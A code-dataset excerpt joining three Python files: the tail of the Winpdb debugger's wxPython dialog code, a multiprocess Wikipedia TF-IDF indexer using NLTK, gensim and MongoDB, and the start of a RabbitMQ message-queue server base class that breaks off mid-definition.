self.Bind(wx.EVT_TEXT, self.OnText, self.m_entry_encoding)
sizerh.Add(self.m_entry_encoding, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
self.m_cb = wx.CheckBox(self, -1, CHECKBOX_ENCODING)
self.m_cb.SetValue(current_fraw)
sizerv.Add(self.m_cb, 0, wx.ALIGN_LEFT | wx.ALL, 5)
btnsizer = wx.StdDialogButtonSizer()
sizerv.Add(btnsizer, 0, wx.ALIGN_RIGHT | wx.ALL, 5)
self.m_ok = wx.Button(self, wx.ID_OK)
self.m_ok.SetDefault()
self.Bind(wx.EVT_BUTTON, self.do_ok, self.m_ok)
if encoding == '':
self.m_ok.Disable()
btnsizer.AddButton(self.m_ok)
btn = wx.Button(self, wx.ID_CANCEL)
btnsizer.AddButton(btn)
btnsizer.Realize()
self.SetSizer(sizerv)
sizerv.Fit(self)
def OnText(self, event):
if event.GetString() == '':
self.m_ok.Disable()
else:
self.m_ok.Enable()
event.Skip()
def get_encoding(self):
encoding = self.m_entry_encoding.GetValue()
encoding = rpdb2.as_unicode(encoding, wx.GetDefaultPyEncoding())
return encoding, self.m_cb.GetValue()
def do_validate(self):
encoding, fraw = self.get_encoding()
if encoding == rpdb2.ENCODING_AUTO:
return True
try:
codecs.lookup(encoding)
return True
except:
pass
dlg = wx.MessageDialog(self, rpdb2.STR_ENCODING_BAD, MSG_WARNING_TITLE, wx.OK | wx.ICON_WARNING)
dlg.ShowModal()
dlg.Destroy()
return True
def do_ok(self, event):
f = self.do_validate()
if not f:
return
event.Skip()
class CSynchronicityDialog(wx.Dialog):
def __init__(self, parent, current_fsynchronicity):
wx.Dialog.__init__(self, parent, -1, DLG_SYNCHRONICITY_TITLE)
sizerv = wx.BoxSizer(wx.VERTICAL)
label = wx.StaticText(self, -1, STATIC_SYNCHRONICITY, size = (300, -1))
try:
label.Wrap(300)
except:
label.SetLabel(STATIC_SYNCHRONICITY_SPLIT)
sizerv.Add(label, 1, wx.ALIGN_LEFT | wx.ALL, 5)
self.m_cb = wx.CheckBox(self, -1, CHECKBOX_SYNCHRONICITY)
self.m_cb.SetValue(current_fsynchronicity)
sizerv.Add(self.m_cb, 0, wx.ALIGN_LEFT | wx.ALL, 5)
btnsizer = wx.StdDialogButtonSizer()
sizerv.Add(btnsizer, 0, wx.ALIGN_RIGHT | wx.ALL, 5)
btn = wx.Button(self, wx.ID_OK)
btn.SetDefault()
btnsizer.AddButton(btn)
btn = wx.Button(self, wx.ID_CANCEL)
btnsizer.AddButton(btn)
btnsizer.Realize()
self.SetSizer(sizerv)
sizerv.Fit(self)
def get_synchronicity(self):
return self.m_cb.GetValue()
class CPwdDialog(wx.Dialog):
def __init__(self, parent, current_password):
wx.Dialog.__init__(self, parent, -1, DLG_PWD_TITLE)
sizerv = wx.BoxSizer(wx.VERTICAL)
label = wx.StaticText(self, -1, STATIC_PWD, size = (300, -1))
try:
label.Wrap(300)
except:
label.SetLabel(STATIC_PWD_SPLIT)
sizerv.Add(label, 1, wx.ALIGN_LEFT | wx.ALL, 5)
sizerh = wx.BoxSizer(wx.HORIZONTAL)
sizerv.Add(sizerh, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
label = wx.StaticText(self, -1, LABEL_PWD)
sizerh.Add(label, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
pwd = [current_password, ''][current_password is None]
if not g_fUnicode:
pwd = rpdb2.as_string(pwd, wx.GetDefaultPyEncoding())
self.m_entry_pwd = wx.TextCtrl(self, value = pwd, size = (200, -1))
self.m_entry_pwd.SetFocus()
self.Bind(wx.EVT_TEXT, self.OnText, self.m_entry_pwd)
sizerh.Add(self.m_entry_pwd, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
btnsizer = wx.StdDialogButtonSizer()
sizerv.Add(btnsizer, 0, wx.ALIGN_RIGHT | wx.ALL, 5)
self.m_ok = wx.Button(self, wx.ID_OK)
self.m_ok.SetDefault()
self.Bind(wx.EVT_BUTTON, self.do_ok, self.m_ok)
if pwd == '':
self.m_ok.Disable()
btnsizer.AddButton(self.m_ok)
btn = wx.Button(self, wx.ID_CANCEL)
btnsizer.AddButton(btn)
btnsizer.Realize()
self.SetSizer(sizerv)
sizerv.Fit(self)
def OnText(self, event):
if event.GetString() == '':
self.m_ok.Disable()
else:
self.m_ok.Enable()
event.Skip()
def get_password(self):
pwd = self.m_entry_pwd.GetValue()
pwd = rpdb2.as_unicode(pwd, wx.GetDefaultPyEncoding())
return pwd
def do_validate(self):
if rpdb2.is_valid_pwd(self.get_password()):
return True
dlg = wx.MessageDialog(self, rpdb2.STR_PASSWORD_BAD, MSG_ERROR_TITLE, wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return False
def do_ok(self, event):
f = self.do_validate()
if not f:
return
event.Skip()
class COpenDialog(wx.Dialog):
def __init__(self, parent, fLocal):
wx.Dialog.__init__(self, parent, -1, DLG_OPEN_TITLE)
sizerv = wx.BoxSizer(wx.VERTICAL)
label = wx.StaticText(self, -1, STATIC_OPEN)
sizerv.Add(label, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
sizerh = wx.BoxSizer(wx.HORIZONTAL)
sizerv.Add(sizerh, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
label = wx.StaticText(self, -1, LABEL_OPEN)
sizerh.Add(label, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
self.m_entry = wx.TextCtrl(self, size = (200, -1))
self.m_entry.SetFocus()
self.Bind(wx.EVT_TEXT, self.OnText, self.m_entry)
sizerh.Add(self.m_entry, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
if fLocal:
btn = wx.Button(self, label = BUTTON_LAUNCH_BROWSE)
self.Bind(wx.EVT_BUTTON, self.do_browse, btn)
sizerh.Add(btn, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
btnsizer = wx.StdDialogButtonSizer()
sizerv.Add(btnsizer, 0, wx.ALIGN_RIGHT | wx.ALL, 5)
self.m_ok = wx.Button(self, wx.ID_OK)
self.m_ok.Disable()
self.m_ok.SetDefault()
btnsizer.AddButton(self.m_ok)
btn = wx.Button(self, wx.ID_CANCEL)
btnsizer.AddButton(btn)
btnsizer.Realize()
self.SetSizer(sizerv)
sizerv.Fit(self)
def OnText(self, event):
if event.GetString() == '':
self.m_ok.Disable()
else:
self.m_ok.Enable()
event.Skip()
def do_browse(self, event = None):
command_line = self.m_entry.GetValue()
(_path, filename, args) = rpdb2.split_command_line_path_filename_args(command_line)
_abs_path = os.path.abspath(_path)
dlg = wx.FileDialog(self, defaultDir = _abs_path, defaultFile = filename, wildcard = WINPDB_WILDCARD, style = wx.OPEN | wx.CHANGE_DIR)
r = dlg.ShowModal()
if r == wx.ID_OK:
path = dlg.GetPaths()[0]
abs_path = os.path.abspath(path)
if (' ' in abs_path):
abs_path = '"' + abs_path + '"'
else:
abs_path = command_line
dlg.Destroy()
self.m_entry.SetValue(abs_path)
def get_file_name(self):
filename = self.m_entry.GetValue()
filename = rpdb2.as_unicode(filename, wx.GetDefaultPyEncoding())
return filename
class CLaunchDialog(wx.Dialog):
def __init__(self, parent, fchdir = True, command_line = ''):
wx.Dialog.__init__(self, parent, -1, DLG_LAUNCH_TITLE)
sizerv = wx.BoxSizer(wx.VERTICAL)
label = wx.StaticText(self, -1, STATIC_LAUNCH_DESC)
sizerv.Add(label, 0, wx.ALIGN_LEFT | wx.ALL, 5)
sizerh = wx.BoxSizer(wx.HORIZONTAL)
sizerv.Add(sizerh, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
label = wx.StaticText(self, -1, LABEL_LAUNCH_COMMAND_LINE)
sizerh.Add(label, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
if not g_fUnicode:
command_line = rpdb2.as_string(command_line, wx.GetDefaultPyEncoding())
self.m_entry_commandline = wx.TextCtrl(self, value = command_line, size = (200, -1))
self.m_entry_commandline.SetFocus()
self.Bind(wx.EVT_TEXT, self.OnText, self.m_entry_commandline)
sizerh.Add(self.m_entry_commandline, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
btn = wx.Button(self, label = BUTTON_LAUNCH_BROWSE)
self.Bind(wx.EVT_BUTTON, self.do_browse, btn)
sizerh.Add(btn, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
self.m_cb = wx.CheckBox(self, -1, CHECKBOX_LAUNCH)
self.m_cb.SetValue(fchdir)
sizerv.Add(self.m_cb, 0, wx.ALIGN_LEFT | wx.ALL, 5)
label = wx.StaticText(self, -1, STATIC_LAUNCH_ENV, size = (400, -1))
try:
label.Wrap(400)
except:
label.SetLabel(STATIC_LAUNCH_ENV_SPLIT)
sizerv.Add(label, 1, wx.ALIGN_LEFT | wx.ALL, 5)
btnsizer = wx.StdDialogButtonSizer()
self.m_ok = wx.Button(self, wx.ID_OK)
self.Bind(wx.EVT_BUTTON, self.do_ok, self.m_ok)
self.m_ok.SetDefault()
btnsizer.AddButton(self.m_ok)
if command_line == '':
self.m_ok.Disable()
btn = wx.Button(self, wx.ID_CANCEL)
btnsizer.AddButton(btn)
btnsizer.Realize()
sizerv.Add(btnsizer, 0, wx.ALIGN_RIGHT | wx.ALL, 5)
self.SetSizer(sizerv)
sizerv.Fit(self)
def OnText(self, event):
if event.GetString() == '':
self.m_ok.Disable()
else:
self.m_ok.Enable()
event.Skip()
def do_browse(self, event = None):
command_line = self.m_entry_commandline.GetValue()
(_path, filename, args) = rpdb2.split_command_line_path_filename_args(command_line)
_abs_path = os.path.abspath(_path)
cwd = rpdb2.getcwdu()
dlg = wx.FileDialog(self, defaultDir = _abs_path, defaultFile = filename, wildcard = WINPDB_WILDCARD, style = wx.OPEN | wx.CHANGE_DIR)
r = dlg.ShowModal()
os.chdir(cwd)
if r == wx.ID_OK:
path = dlg.GetPaths()[0]
abs_path = os.path.abspath(path)
if (' ' in abs_path):
abs_path = '"' + abs_path + '"'
else:
abs_path = command_line
dlg.Destroy()
self.m_entry_commandline.SetValue(abs_path)
def do_validate(self):
command_line = self.m_entry_commandline.GetValue()
command_line = rpdb2.as_unicode(command_line, wx.GetDefaultPyEncoding())
(_path, filename, args) = rpdb2.split_command_line_path_filename_args(command_line)
try:
_filename = os.path.join(_path, filename)
abs_path = rpdb2.FindFile(_filename)
except IOError:
dlg = wx.MessageDialog(self, MSG_ERROR_FILE_NOT_FOUND, MSG_ERROR_TITLE, wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return False
if ' ' in abs_path:
command_line = ('"' + abs_path + '" ' + args).strip()
else:
command_line = (abs_path + ' ' + args).strip()
self.m_entry_commandline.SetValue(command_line)
return True
def do_ok(self, event):
f = self.do_validate()
if not f:
return
event.Skip()
def get_command_line(self):
command_line = self.m_entry_commandline.GetValue()
command_line = rpdb2.as_unicode(command_line, wx.GetDefaultPyEncoding())
return (command_line, self.m_cb.GetValue())
def StartClient(command_line, fAttach, fchdir, pwd, fAllowUnencrypted, fRemote, host):
sm = rpdb2.CSessionManager(pwd, fAllowUnencrypted, fRemote, host)
try:
app = CWinpdbApp(sm, fchdir, command_line, fAttach, fAllowUnencrypted)
except SystemError:
if os.name == rpdb2.POSIX:
rpdb2._print(STR_X_ERROR_MSG, sys.__stderr__)
sys.exit(1)
raise
if not 'unicode' in wx.PlatformInfo:
dlg = wx.MessageDialog(None, STR_WXPYTHON_ANSI_WARNING_MSG, STR_WXPYTHON_ANSI_WARNING_TITLE, wx.OK | wx.ICON_WARNING)
dlg.ShowModal()
dlg.Destroy()
app.MainLoop()
sm.shutdown()
def main():
if rpdb2.get_version() != "RPDB_2_4_8":
rpdb2._print(STR_ERROR_INTERFACE_COMPATIBILITY % ("RPDB_2_4_8", rpdb2.get_version()))
return
return rpdb2.main(StartClient, WINPDB_TITLE)
def get_version():
return WINPDB_VERSION
if __name__=='__main__':
ret = main()
#
# Debuggee breaks (pauses) here
# before program termination.
#
# You can step to debug any exit handlers.
#
rpdb2.setbreak()
|
indexer.py
|
# Python packages
from __future__ import division
from __future__ import with_statement
import os
import multiprocessing
import threading
import Queue
import logging
import collections
import operator
import codecs
import string
import math
from wiki_dump_reader import page_generator, plain_page_generator
try:
import cPickle as pickle
except ImportError:
import pickle
# External packages and modules
import gensim
try:
import pymongo
except ImportError:
pymongo = None
print """\
WARNING: pymongo package could not be found.
If you are using a SMALL corpus---such as the *Simple English*
version of Wikipedia---and the inverted token index can fit
entirely in memory, then comment out this `raise` line.
Otherwise, please install the PyMongo library!
"""
raise
pymongo = None # DEBUG: Uncomment to disable (useful for small corpora)
import nltk
from nltk.corpus import stopwords
# Project modules
# *** IMPORTED AT THE END OF THIS FILE ***
# MODULE CONFIGURATION
# How many page worker threads to use
NUMBER_OF_PROCESSES = max(1, multiprocessing.cpu_count() - 1)
# How many pages to send to each worker at a time.
CHUNK_SIZE = 32
# Arbitrary amount
MAX_QUEUE_ITEMS = NUMBER_OF_PROCESSES
# Logging display level
logging.basicConfig(level=logging.DEBUG)
# NLP (NLTK) settings
tokenizer = nltk.tokenize.TreebankWordTokenizer()
#stemmer = nltk.PorterStemmer()
stemmer = None
lemmatizer = nltk.WordNetLemmatizer()
PUNKT_FNAME = "wiki_punkt.pickle"
try:
with open(PUNKT_FNAME, mode='rb') as f:
sent_detector = pickle.load(f)
except (IOError, pickle.UnpicklingError):
sent_detector = None
STOPWORDS = [lemmatizer.lemmatize(t) for t in stopwords.words('english')]
# CONSTANTS AND GLOBAL VARS
LINE_SEPARATOR = u'\u2028'
PARAGRAPH_SEPARATOR = u'\u2029'
# Bad page checks
page_length_limit = 1024
# EXCEPTIONS
class IndexLoadError(Exception):
pass
# CLASSES
class Index(object):
def __init__(self, base_fname, doci_in_memory=False):
self.base_fname = base_fname
check_plain_corpus(base_fname)
if pymongo:
self.load_mongo()
self.load_dict()
self.load_pagi()
if doci_in_memory:
self.load_doci()
else:
self.doci = DocI(self)
self.load_tokc()
self.load_toki()
def load_mongo(self):
self.mongo_conn = pymongo.Connection('localhost', 27017)
self.mongo_db = self.mongo_conn[mongo_db_name(self.base_fname)]
def load_dict(self):
try:
self.dict = (gensim.corpora.dictionary.Dictionary().
load_from_text(self.base_fname + '.dict'))
except IOError:
raise IndexLoadError
def load_pagi(self):
self.pagi = dict()
try:
with codecs.open(self.base_fname + '.pagi', encoding='utf-8') as f:
for line in f:
ID, start, offset = line.split('\t')
self.pagi[int(ID)] = (int(start), int(offset))
if not self.pagi:
raise IndexLoadError
except (IOError, ValueError):
raise IndexLoadError
def load_doci(self):
self.doci = collections.defaultdict(dict)
try:
with codecs.open(self.base_fname + '.doci', encoding='utf-8') as f:
for line in f:
ID, token_counts = line.split('\t', 1)
for token_count in token_counts.split('\t'):
token, count = token_count.split(chr(26))
self.doci[int(ID)][int(token)] = int(count)
if not self.doci:
raise IndexLoadError
except IOError:
raise IndexLoadError
def load_tokc(self):
try:
with open(self.base_fname + '.tokc', mode='rb') as f:
self.tokc = pickle.load(f)
if not self.tokc:
raise IndexLoadError
except (IOError, pickle.UnpicklingError):
raise IndexLoadError
def load_toki(self):
self.toki = TokI(self)
def get_page(self, ID):
def find_page(start):
wiki_dump.seek(start)
pages = plain_page_generator(wiki_dump)
return next(pages)
with open(self.base_fname + '.txt', mode='rb') as wiki_dump:
try:
iterator = iter(ID)
except TypeError:
start, offset = self.pagi[ID]
return find_page(start)
else:
pages = []
for page in ID:
start, offset = self.pagi[page]
pages.append(find_page(start))
return pages
def union(self, terms):
terms = list(terms)
try:
# Check that each term is a number (token-ID).
_ = [x + 1 for x in terms]
except TypeError:
# They're not numbers, so we need to convert them to token-IDs.
terms = [self.dict.token2id.get(term, None) for term in terms]
terms = [x for x in terms if x]
pages = set()
if pymongo:
pages.update(self.toki[terms])
else:
for term in terms:
if term in self.toki:
ID = self.toki[term]
pages.update(ID)
return pages
def intersect(self, terms):
terms = list(terms)
try:
# Check that each term is a number (token-ID).
_ = [x + 1 for x in terms]
except TypeError:
# They're not numbers, so we need to convert them to token-IDs.
terms = [self.dict.token2id.get(term, None) for term in terms]
terms = [x for x in terms if x]
pages = set(self.toki[terms.pop()])
for term in terms:
if term in self.toki:
ID = self.toki[term]
pages.intersection_update(ID)
return pages
def ranked(self, terms):
terms = list(terms)
try:
# Check that each term is a number (token-ID).
_ = [x + 1 for x in terms]
except TypeError:
# They're not numbers, so we need to convert them to token-IDs.
terms = [self.dict.token2id.get(term, None) for term in terms]
terms = [x for x in terms if x]
q_tfidf = self.query_tfidf(terms)
pages = self.union(terms)
ranked_pages = dict()
for ID in pages:
# Calculate document TF-IDF
d_tfidf = dict()
token_counts = self.doci[ID]
max_count = max(token_counts.itervalues())
for term in token_counts:
# TF: Raw frequency divided by the maximum raw frequency
# of any term in the document.
tf = token_counts[term] / max_count
# IDF: Total number of documents in the corpus divided by
# the number of documents where the term appears.
idf = math.log(len(self.doci) / self.dict.dfs[term])
d_tfidf[term] = tf * idf
# Calculate inner product
inner_product = 0
for term in terms:
if term in token_counts:
inner_product += q_tfidf[term] * d_tfidf[term]
# Calculate query length
query_length = 0
for term in q_tfidf:
query_length += q_tfidf[term] ** 2
query_length = math.sqrt(query_length)
# Calculate document length
doc_length = 0
for term in d_tfidf:
doc_length += d_tfidf[term] ** 2
doc_length = math.sqrt(doc_length)
# Calculate the cosine similarity
cosine_sim = inner_product / (query_length * doc_length)
ranked_pages[ID] = cosine_sim
ranked_pages = sorted(ranked_pages.iteritems(),
key=operator.itemgetter(1), reverse=True)
return ranked_pages
def query_tfidf(self, terms):
token_count = collections.defaultdict(int)
try:
terms = [self.dict.token2id[term] for term in terms]
except KeyError:
pass
for term in terms:
token_count[term] += 1
max_count = max(token_count.itervalues())
return {term: token_count[term] / max_count for term in token_count}
class DocI(object):
def __init__(self, index):
self.index = index
# Make sure the file can open and at least the first line is parsable.
try:
with codecs.open(self.index.base_fname + '.doci',
encoding='utf-8') as f:
line = f.readline()
ID, token_counts = line.split('\t', 1)
for token_count in token_counts.split('\t'):
token, count = token_count.split(chr(26))
ID, token, count = int(ID), int(token), int(count)
except IOError:
raise IndexLoadError
def __getitem__(self, ID):
"""Retrieve the dictionary result of: {page.ID -> page.token_count}"""
counts = dict()
with codecs.open(self.index.base_fname + '.doci',
encoding='utf-8') as f:
start, offset = self.index.pagi[ID]
f.seek(offset)
line = f.readline()
ID, token_counts = line.split('\t', 1)
for token_count in token_counts.split('\t'):
token, count = token_count.split(chr(26))
counts[int(token)] = int(count)
return counts
def __len__(self):
"""Returns the equivalent length of self.index.pagi"""
return len(self.index.pagi)
class TokI(object):
"""Wrapper class around the .toki index file; allows for toki[token].
This class allows access to the toki {token -> set(page.IDs)} whether
the underlying index is from a MongoDB or a defaultdict loaded entirely
into memory.
"""
def __init__(self, index):
"""Initialize the TokI object from a MongoDB or load from disk."""
self.index = index
if pymongo:
if 'toki' in self.index.mongo_db.collection_names():
self.mongo_toki = self.index.mongo_db['toki']
if self.mongo_toki.count() == 0:
raise IndexLoadError
else:
raise IndexLoadError
else:
# Load into memory (not suitable for large corpora!)
try:
with open(self.index.base_fname + '.toki', mode='rb') as f:
self.toki = pickle.load(f)
if not self.toki:
raise IndexLoadError
except (IOError, pickle.UnpicklingError):
raise IndexLoadError
def __getitem__(self, token):
"""Retrieve a token's set of page IDs: {token -> set(page.IDs)}"""
if pymongo:
try:
iter(token)
except TypeError:
token = [token]
results = set()
for result in self.mongo_toki.find({'tok': {'$in': token}}):
results.add(result['_id'])
if results:
return results
else:
print 'ERROR: bad token = {}'.format(token)
raise KeyError
else:
return self.toki[token]
def __contains__(self, key):
"""Checks if key exists in the index."""
if pymongo:
return self.mongo_toki.find_one({'tok': key}) is not None
else:
return key in self.toki
# FUNCTIONS
def check_plain_corpus(base_fname):
"""Attempts to make sure the plain-text corpus is available."""
try:
with open(base_fname + '.txt') as wiki_dump:
pages = plain_page_generator(wiki_dump)
if not next(pages):
raise IndexLoadError
except IOError:
raise IndexLoadError
def mongo_db_name(base_fname):
"""Use the corpus filename to create the database name."""
fname = base_fname.replace('\\', '/').rsplit('/', 1)[1]
fname = fname.replace('.', '_')
return fname
def regularize(tokens):
"""Returns a copy of a regularized version of the token list."""
tokens = list(tokens)
for i, token in enumerate(tokens):
# Normalize text by case folding
token = token.lower()
# Lemmatize (birds -> bird)
token = lemmatizer.lemmatize(token)
# Stopword and punctuation removal
if token in STOPWORDS or token in string.punctuation:
token = None
# Done; update value in list
tokens[i] = token
# Remove empty tokens
tokens = [x for x in tokens if x is not None]
return tokens
def first_pass_worker(taskq, doneq):
"""Processes pages to make a plain-text corpus from the original dump."""
logger = logging.getLogger('worker')
done_buff = []
try:
while True:
chunk = taskq.get()
if chunk is None:
return
for page in chunk:
page.preprocess()
if len(page.text) < page_length_limit:
continue
# Need to get tokens so we can build our Dictionary
page.regularize_text()
done_buff.append(page)
doneq.put(done_buff)
done_buff = []
finally:
doneq.put(None)
def second_pass_worker(taskq, doneq):
"""Counts tokens from the plain-text corpus to create an index."""
logger = logging.getLogger('worker')
done_buff = []
try:
while True:
chunk = taskq.get()
if chunk is None:
return
for page in chunk:
page.regularize_text()
page.count_tokens()
done_buff.append(page)
doneq.put(done_buff)
done_buff = []
finally:
doneq.put(None)
def first_pass_writer(doneq, wiki_location):
"""Extracts the Dictionary (vocabulary) and writes plain-text corpus."""
pill_count = 0 # termination condition (poison pill)
dictionary = gensim.corpora.dictionary.Dictionary()
try:
with codecs.open(wiki_location + '.txt',
mode='w',
encoding='utf-8') as txt:
# Begin processing chunks as they come in.
while True:
chunk = doneq.get()
if chunk is None:
pill_count += 1
if pill_count == NUMBER_OF_PROCESSES:
return
else:
continue
for page in chunk:
# Send all tokens from document to Dictionary
all_tokens = []
para_sent = []
for para in page.paragraphs:
for sentence in para.sentence_tokens:
all_tokens.extend(sentence)
sent = LINE_SEPARATOR.join(para.sentences)
para_sent.append(sent)
para_sent = PARAGRAPH_SEPARATOR.join(para_sent)
dictionary.doc2bow(all_tokens, allow_update=True)
# page.text = unicode(page.text)
txt.write('\t'.join([str(page.ID), page.title, para_sent])
+ '\n')
finally:
# Save token indices
# TODO(bwbaugh): Make the filtering of the dictionary configurable.
# dictionary.filter_extremes(no_below=2, no_above=0.9)
dictionary.save_as_text(wiki_location + '.dict')
def second_pass_writer(doneq, wiki_location):
"""Writes various index files for fast searching and retrieval of pages."""
if pymongo:
mongo_conn = pymongo.Connection('localhost', 27017)
mongo_db = mongo_conn[mongo_db_name(wiki_location)]
mongo_toki = mongo_db['toki']
# Delete any existing data
mongo_toki.drop()
else:
token_docs = collections.defaultdict(set)
token_counts = collections.defaultdict(int)
dictionary = (gensim.corpora.dictionary.Dictionary().
load_from_text(wiki_location + '.dict'))
try:
with codecs.open(wiki_location + '.pagi',
mode='w',
encoding='utf-8') as pagi,\
codecs.open(wiki_location + '.doci',
mode='w',
encoding='utf-8') as doci:
# Begin processing chunks as they come in.
pill_count = 0 # termination condition (poison pill)
while True:
chunk = doneq.get()
if chunk is None:
pill_count += 1
if pill_count == NUMBER_OF_PROCESSES:
return
else:
continue
if pymongo:
# Used to store pages from the chunk for a batch insert.
mongo_list = []
for page in chunk:
# Convert token from a string to an integer ID, and
# remove tokens that don't appear in our Dictionary.
page.token_count = [(dictionary.token2id[t], c) for t, c in
page.token_count if t in
dictionary.token2id]
pagi.write('\t'.join([str(page.ID).ljust(1),
str(page.start).ljust(1),
str(doci.tell()).ljust(1)]) + '\n')
doci.write('\t'.join([str(page.ID)] +
[chr(26).join([str(k), str(v)]) for
k, v in page.token_count]) +
'\n')
if pymongo:
token_list = []
for token, count in page.token_count:
# Get the set tokens that appear in the page.
token_list.append(token)
token_counts[token] += int(count)
mongo_list.append((page.ID, token_list))
else:
for token, count in page.token_count:
token_docs[token].add(page.ID)
token_counts[token] += int(count)
for f in (pagi, doci):
f.flush()
if pymongo:
# Batch insert all pages from this chunk.
mongo_toki.insert([{'_id': ID, 'tok': token_list} for
ID, token_list in mongo_list])
finally:
# Save token indices
with open(wiki_location + '.tokc', mode='wb') as tokc:
pickle.dump(token_counts, tokc, protocol=pickle.HIGHEST_PROTOCOL)
if pymongo:
mongo_toki.ensure_index('tok') # blocking
mongo_conn.disconnect()
else:
with open(wiki_location + '.toki', mode='wb') as toki:
pickle.dump(token_docs, toki, protocol=pickle.HIGHEST_PROTOCOL)
def create_punkt_sent_detector(fname, progress_count, max_pages=25000):
"""Makes a pass through the corpus to train a Punkt sentence segmenter."""
logger = logging.getLogger('create_punkt_sent_detector')
punkt = nltk.tokenize.punkt.PunktTrainer()
logger.info("Training punkt sentence detector")
wiki_size = os.path.getsize(fname)
page_count = 0
try:
with open(fname, mode='rb') as wiki_dump:
pages = page_generator(wiki_dump)
for page in pages:
page.preprocess()
punkt.train(page.text, finalize=False, verbose=False)
page_count += 1
if page_count == max_pages:
break
if page_count % progress_count == 0:
print(page_count, page.start,
(page.start / wiki_size * 100),
# taskq.qsize() if taskq is not None else 'n/a',
# doneq.qsize() if doneq is not None else 'n/a',
page.ID, page.title)
except KeyboardInterrupt:
print 'KeyboardInterrupt: Stopping the reading of the dump early!'
logger.info('Now finalzing Punkt training.')
punkt.finalize_training(verbose=True)
learned = punkt.get_params()
sbd = nltk.tokenize.punkt.PunktSentenceTokenizer(learned)
with open(PUNKT_FNAME, mode='wb') as f:
pickle.dump(sbd, f, protocol=pickle.HIGHEST_PROTOCOL)
def first_pass(fname, progress_count=None, max_pages=None):
"""Extract a Dictionary and create plain-text version of corpus."""
logger = logging.getLogger('first_pass')
wiki_size = os.path.getsize(fname)
# Page task queues for parallel processing
taskq = multiprocessing.Queue(MAX_QUEUE_ITEMS)
doneq = multiprocessing.Queue(MAX_QUEUE_ITEMS)
# Start worker processes
logger.info('Starting workers')
workers = []
for i in range(NUMBER_OF_PROCESSES):
p = multiprocessing.Process(target=first_pass_worker,
args=(taskq, doneq))
p.start()
workers.append(p)
# Start log writer process
p = multiprocessing.Process(target=first_pass_writer, args=(doneq, fname))
p.start()
workers.append(p)
# Process XML dump
logger.info('Begining XML parse')
wiki_size = os.path.getsize(fname)
page_count = 0
task_buff = []
try:
with open(fname, mode='rb') as wiki_dump:
pages = page_generator(wiki_dump)
for page in pages:
task_buff.append(page)
if len(task_buff) == CHUNK_SIZE:
taskq.put(task_buff)
task_buff = []
page_count += 1
if page_count == max_pages:
break
if page_count % progress_count == 0:
print(page_count, page.start,
(page.start / wiki_size * 100),
taskq.qsize(), doneq.qsize(),
page.ID, page.title)
except KeyboardInterrupt:
print 'KeyboardInterrupt: Stopping the reading of the dump early!'
finally:
# Flush task buffer
taskq.put(task_buff)
task_buff = []
# Tell child processes to stop
for i in range(NUMBER_OF_PROCESSES):
taskq.put(None)
logger.info('All done! Processed %s total pages.', page_count)
# Wait for all child processes to stop (especially that writer!)
for p in workers:
p.join()
# Main function of module
def create_index(fname, progress_count=None, max_pages=None):
"""Processes a corpus to create a corresponding Index object."""
logger = logging.getLogger('create_index')
if sent_detector is None:
create_punkt_sent_detector(fname=fname,
progress_count=CHUNK_SIZE,
max_pages=min(25000, max_pages))
# Set params
if progress_count is None:
progress_count = CHUNK_SIZE * NUMBER_OF_PROCESSES
# First pass, create Dictionary and plain-text version of corpus.
try:
dictionary = (gensim.corpora.dictionary.Dictionary().
load_from_text(fname + '.dict'))
if not dictionary or check_plain_corpus(fname):
raise IndexLoadError
except (IOError, IndexLoadError):
first_pass(fname, progress_count, max_pages)
else:
del dictionary
# Page task queues for parallel processing
taskq = multiprocessing.Queue(MAX_QUEUE_ITEMS)
doneq = multiprocessing.Queue(MAX_QUEUE_ITEMS)
# Start worker processes
logger.info('Starting workers')
workers = []
for i in range(NUMBER_OF_PROCESSES):
p = multiprocessing.Process(target=second_pass_worker,
args=(taskq, doneq))
p.start()
workers.append(p)
# Start log writer process
p = multiprocessing.Process(target=second_pass_writer, args=(doneq, fname))
p.start()
workers.append(p)
# We are now working with the plain-text corpus generated in the 1st pass.
fname += '.txt'
wiki_size = os.path.getsize(fname)
# Process XML dump
logger.info('Begining plain-text parse')
wiki_size = os.path.getsize(fname)
page_count = 0
task_buff = []
try:
with open(fname, mode='rb') as wiki_dump:
pages = plain_page_generator(wiki_dump)
for page in pages:
task_buff.append(page)
if len(task_buff) == CHUNK_SIZE:
taskq.put(task_buff)
task_buff = []
page_count += 1
if page_count == max_pages:
break
if page_count % progress_count == 0:
print(page_count, page.start,
(page.start / wiki_size * 100),
taskq.qsize(), doneq.qsize(),
page.ID, page.title)
except KeyboardInterrupt:
print 'KeyboardInterrupt: Stopping the reading of the dump early!'
finally:
# Flush task buffer
taskq.put(task_buff)
task_buff = []
# Tell child processes to stop
for i in range(NUMBER_OF_PROCESSES):
taskq.put(None)
logger.info('All done! Processed %s total pages.', page_count)
# Wait for all child processes to stop (especially that writer!)
for p in workers:
p.join()
# PROJECT MODULE IMPORTS
|
mq_server_base.py
|
import os
import pika
from multiprocessing.pool import ThreadPool
import threading
import pickle
from functools import partial
from typing import Tuple
from queue import Queue
import time
from abc import ABCMeta,abstractmethod
import sys
sys.setrecursionlimit(100000)
import functools
import termcolor
import datetime
print=functools.partial(print,flush=True)
tostring=lambda *args:' '.join(map(str,args))
printred=lambda *args,**kwargs:termcolor.cprint(tostring(*args),color='red',flush=True,**kwargs)
printgreen=lambda *args,**kwargs:termcolor.cprint(tostring(*args),color='green',flush=True,**kwargs)
def info_prefix():
return '[{} info]'.format(datetime.datetime(1,1,1).now())
class MessageQueueServerBase(metaclass=ABCMeta):
_rmq_server_addr = None
_username=None
_request_pipe_name = None
_response_pipe_name = None
_eval_callback = None
_nr_threads = None
heartbeat=0
@property
def nr_threads(self):
return self._nr_threads
@nr_threads.setter
def nr_threads(self, v):
self._nr_threads = v
@abstractmethod
def eval():
